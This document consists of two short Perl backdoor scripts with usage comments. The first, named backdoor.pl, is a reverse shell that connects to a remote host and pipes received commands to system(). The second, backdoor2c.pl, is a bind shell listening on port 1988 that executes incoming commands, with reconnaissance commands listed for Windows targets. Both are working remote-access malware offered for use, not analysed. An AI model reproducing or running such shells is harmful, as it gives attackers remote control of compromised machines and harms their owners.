1. #!/usr/bin/perl
2. #usage:
3. #nc -vv -l -p PORT(default 1988) on your local system first,then
4. #Perl $0 Remote IP(default Remote_port(default 1988)
5. #Type 'exit' to exit or press Enter to gain shell when u under the 'console'.
6. #nc -vv -l -p 1988
7. #perl backdoor.pl 1988
9. #use strict;
10. use Socket;
11. use IO::Socket;
12. use Cwd;
13. use IO::Handle;
14. my $remote = $ARGV[0]|| "";
15. my $remote_port = $ARGV[1]|| 1988;
16. my $pack_addr = sockaddr_in( $remote_port, inet_aton($remote));
17. my $path = cwd();
18. $ARGC = @ARGV;
19. if ($ARGV[0]!~/-/)
20. {
21. socket(SOCKET, PF_INET, SOCK_STREAM,getprotobyname('tcp')) or die "socket error: ";
22. STDOUT->autoflush(1);
23. SOCKET->autoflush(1);
24. $conn=connect(SOCKET,$pack_addr)||die "connection error : $!";
25. open STDIN,">&SOCKET";
26. open STDOUT,">&SOCKET";
27. open STDERR,">&SOCKET";
28. print "You are in $path\n";
29. print "Welcome to use.\n";
30. print "console>\n";
32. while (<STDIN>) {
33. chomp;
34. if( lc($_) eq 'exit' ) {
35. print " Bye Bye!";
36. exit;
37. }
38. $msg=system($_);
39. if($msg){
40. print STDOUT "\n$msg\n";
41. print STDOUT "console>";
42. }else
43. {
44. print "console>";
45. }
46. }
47. close SOCKET;
48. exit;
49. }
1. #!/usr/bin/perl
2. #ActivePerl 5.8.8 Build 822
3. #usage:
4. #first:perl backdoor2c.pl
5. #second:nc -vv 1988
6. #net user
7. #ipconfig /all
8. #netstat -anb
9. use IO::Socket;
10. $port = "1988";
11. my $socket = new IO::Socket::INET ( 'Localhost'=>'' ,
12. 'LocalPort'=>$port ,
13. 'Listen'=>1 ,
14. 'Proto'=>'tcp' ,
15. 'Reuse'=>1 );
16. die "Reason: $!" unless $socket;
17. while (my $new_socket = $socket->accept()) {
18. while (my $buffer=<$new_socket> ){
19. if ($buffer=~/exit/) {exit;}
20. $res_msg=`$buffer`;
21. print $new_socket "$res_msg\ncmd>";
22. }}
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